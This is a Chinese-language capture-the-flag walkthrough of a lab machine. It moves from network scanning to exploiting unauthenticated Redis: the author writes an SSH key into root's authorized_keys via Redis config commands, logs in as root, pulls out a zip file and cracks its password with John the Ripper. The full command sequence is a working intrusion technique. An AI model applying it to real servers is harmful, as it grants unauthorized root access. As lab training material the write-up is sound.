目录
信息收集
arp
┌─[root@parrot]─[~/vulnyx]
└──╼ #arp-scan -l
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:16:3d:f8, IPv4: 192.168.9.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.103 08:00:27:6a:76:52 PCS Systemtechnik GmbH
9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.980 seconds (129.29 hosts/sec). 9 responded
nmap
端口扫描
┌─[✗]─[root@parrot]─[~/vulnyx]
└──╼ #nmap -p- 192.168.9.103 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-12 12:23 GMT
Nmap scan report for 192.168.9.103
Host is up (0.00031s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6379/tcp open redis
8080/tcp open http-proxy
MAC Address: 08:00:27:6A:76:52 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.55 seco
┌─[root@parrot]─[~/vulnyx]
└──╼ #cat port.nmap | head -n 9 | tail -n 4 | awk -F "/" '{print($1)}' | xargs -n 4 | sed 's/ /,/g'
22,80,6379,8080
服务版本信息扫描
┌─[root@parrot]─[~/vulnyx]
└──╼ #nmap -sC -sV -O -p 22,80,6379,8080 192.168.9.103 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-12 12:25 GMT
Nmap scan report for 192.168.9.103
Host is up (0.00061s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 51:f9:f5:59:cd:45:4e:d1:2c:06:41:3b:a6:7a:91:19 (RSA)
| 256 5c:9f:60:b7:c5:50:fc:01:fa:37:7c:dc:16:54:87:3b (ECDSA)
|_ 256 04:da:68:25:69:d6:2a:25:e2:5b:e2:99:36:36:d7:48 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: Apache2 Test Debian Default Page: It works
|_http-server-header: Apache/2.4.54 (Debian)
6379/tcp open redis Redis key-value store 6.0.16
8080/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache2 Test Debian Default Page: It works
MAC Address: 08:00:27:6A:76:52 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.38 seco
靶机一共开放了4个端口
22、80、8080
还开放了6379 redis数据库的端口!
这个6379端口应该就是突破口!
nikto
┌─[root@parrot]─[~/vulnyx]
└──╼ #nikto -h http://192.168.9.103
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.9.103
+ Target Hostname: 192.168.9.103
+ Target Port: 80
+ Start Time: 2024-04-12 12:30:36 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.54 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 29d1, size: 5e428196dbffb, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2024-04-12 12:30:55 (GMT0) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tes
┌─[root@parrot]─[~/vulnyx]
└──╼ #nikto -h http://192.168.9.103:8080
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.9.103
+ Target Hostname: 192.168.9.103
+ Target Port: 8080
+ Start Time: 2024-04-12 12:28:33 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.54 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 29d1, size: 5e4281ef033d9, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2024-04-12 12:28:54 (GMT0) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) teste
Redis未授权访问漏洞
靶机的主页没啥好看的,6379是突破口!
漏洞扫描
┌─[✗]─[root@parrot]─[~/vulnyx]
└──╼ #nmap --script redis-info -sV -p 6379 192.168.9.103 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-12 12:38 GMT
Nmap scan report for 192.168.9.103
Host is up (0.00045s latency).
PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 6.0.16 (64 bits)
| redis-info:
| Version: 6.0.16
| Operating System: Linux 5.10.0-16-amd64 x86_64
| Architecture: 64 bits
| Process ID: 357
| Used CPU (sys): 1.325301
| Used CPU (user): 0.000000
| Connected clients: 2
| Connected slaves: 0
| Used memory: 873.01K
| Role: master
| Bind addresses:
| 0.0.0.0
| Client connections:
|_ 192.168.9.102
MAC Address: 08:00:27:6A:76:52 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.30 seconds
redis版本是 6.0.16
redis连接可以用 nc 也可以用 redis-cli
redis-cli
┌─[root@parrot]─[~/vulnyx]
└──╼ #redis-cli -h 192.168.9.103
192.168.9.103:6379> help
redis-cli 7.0.15
To get help about Redis commands type:
"help @<group>" to get a list of commands in <group>
"help <command>" for help on <command>
"help <tab>" to get a list of possible help topics
"quit" to exit
To set redis-cli preferences:
":set hints" enable online hints
":set nohints" disable online hints
Set your preferences in ~/.redisclirc
192.168.9.103:6379>
使用info发现返回一些地址以及服务信息!说明不需要认证我们就可以利用redis!
写入公钥
┌─[root@parrot]─[~/vulnyx]
└──╼ #(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
┌─[root@parrot]─[~/vulnyx]
└──╼ #cat spaced_key.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDhOk4J/nc9g0wiCh6VSN1qXugxxw6pmTOaalM4+hNw+bDP68MTT3Ib0rIfFw7VG2Jb83M09hLJ81vQNOG4f5hZDRE/Rk9UklRSf5YMim7AToRMki7nKAGGcBSGdl0zu6zNMFfhXsBIHGz/4WRWOZeDFgypZg7UfG//BBA+xKQnKMiCeiSeDvfrSxhcHptr2GbZ0XMnxb2uVtFkWRL8skdKXsglhNe7q156yG4gihf/bPnGzW5//BS61ESD2UpwAxezQadRNW68ravIfp2NoV+sg/3Q4Ruj75Dn7H5cPfewHNaBalHdYF1ToBjIyEzcH6rqFJPWUo1YtXMac+UOixMYGusc1xjT38jk5fAHYYVI/Uv4S43I2aXQTl+Rb10Y9nbeHkIRFC8+Wyk8+UWGtsgvxTTdPsFdT3eOq+7pZcx8K6M+OAB+G94m9YKXC67VS4HiYjbRu/bhAwNh16nGRokcWgVj2Zi/NR6NGOflhHN95Rk+nQRlUJsRX+wFS05E2A0= root@parrot
将自己的公钥写入到一个文件中!
┌─[root@parrot]─[~/vulnyx]
└──╼ #cat spaced_key.txt | redis-cli -h 192.168.9.103 -x set ssh_key
OK
192.168.9.103:6379> KEYS *
1) "ssh_key"
写入成功!
虽然写入成功了,但是我们还需要把公钥写入到靶机存放公钥地址的地方!
192.168.9.103:6379> config set dir /root/.ssh
OK
192.168.9.103:6379> config set dbfilename "authorized_keys"
OK
192.168.9.103:6379> save
OK
(0.51s)
我尝试直接写入到root/.ssh目录下,发现成功了!说明这个redis是以root方式运行的!
ssh连接
因为写入的是我的公钥,所以我们直接连接即可!
┌─[✗]─[root@parrot]─[~/vulnyx]
└──╼ #ssh root@192.168.9.104
The authenticity of host '192.168.9.104 (192.168.9.104)' can't be established.
ED25519 key fingerprint is SHA256:7e6nZsLIg3VH7MUpoakFpn75ysrvjz0K0YGrMGHcpLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.9.104' (ED25519) to the list of known hosts.
Linux ready 5.10.0-16-amd64 #1 SMP Debian 5.10.127-1 (2022-06-30) x86_64
Last login: Wed Jul 12 18:22:32 2023
root@ready:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ready:~# ls
root.zip
root@ready:~# 7z
-bash: 7z: orden no encontrada
root@ready:~# unzip
-bash: unzip: orden no encontrada
root@ready:~# python3 -m http.server 9900
Serving HTTP on 0.0.0.0 port 9900 (http://0.0.0.0:9900/) ...
192.168.9.102 - - [13/Apr/2024 03:02:18] "GET /root.zip HTTP/1.1" 200 -
┌─[✗]─[root@parrot]─[~/vulnyx]
└──╼ #wget http://192.168.9.104:9900/root.zip
--2024-04-13 01:02:18-- http://192.168.9.104:9900/root.zip
正在连接 192.168.9.104:9900... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:225 [application/zip]
正在保存至: “root.zip”
root.zip 100%[=================================================>] 225 --.-KB/s 用时 0s
2024-04-13 01:02:18 (35.3 MB/s) - 已保存 “root.zip” [225/225])
┌─[root@parrot]─[~/vulnyx]
└──╼ #unzip -l root.zip
Archive: root.zip
Length Date Time Name
--------- ---------- ----- ----
32 2023-04-18 16:14 root.txt
--------- -------
32 1 file
┌─[root@parrot]─[~/vulnyx]
└──╼ #unzip root.zip
[root.zip] root.txt password:
好家伙,需要密码啊!我们破解一下吧!
get root.txt
┌─[root@parrot]─[~/vulnyx]
└──╼ #zip2john root.zip >> root.list
ver 2.0 efh 5455 efh 7875 root.zip/root.txt PKZIP Encr: TS_chk, cmplen=43, decmplen=32, crc=68F3F801 ts=91CA cs=91ca type=8
┌─[✗]─[root@parrot]─[~/vulnyx]
└──╼ #john root.list /usr/share/wordlists/rockyou.txt
0g 0:00:00:49 3/3 0g/s 38926Kp/s 38926Kc/s 38926KC/s sm1k2gr..snonb3y
0g 0:00:00:50 3/3 0g/s 38959Kp/s 38959Kc/s 38959KC/s rj4pfm5..rjta27t
already (root.zip/root.txt)
1g 0:00:00:51 DONE 3/3 (2024-04-13 01:12) 0.01960g/s 39021Kp/s 39021Kc/s 39021KC/s alremoa..alr160k
Use the "--show" option to display all of the cracked passwords reliably
Session complet
密码 already
┌─[root@parrot]─[~/vulnyx]
└──╼ #unzip root.zip
Archive: root.zip
[root.zip] root.txt password:
inflating: root.txt
┌─[root@parrot]─[~/vulnyx]
└──╼ #cat root.txt
cf537b04dd79e859816334b89e85c435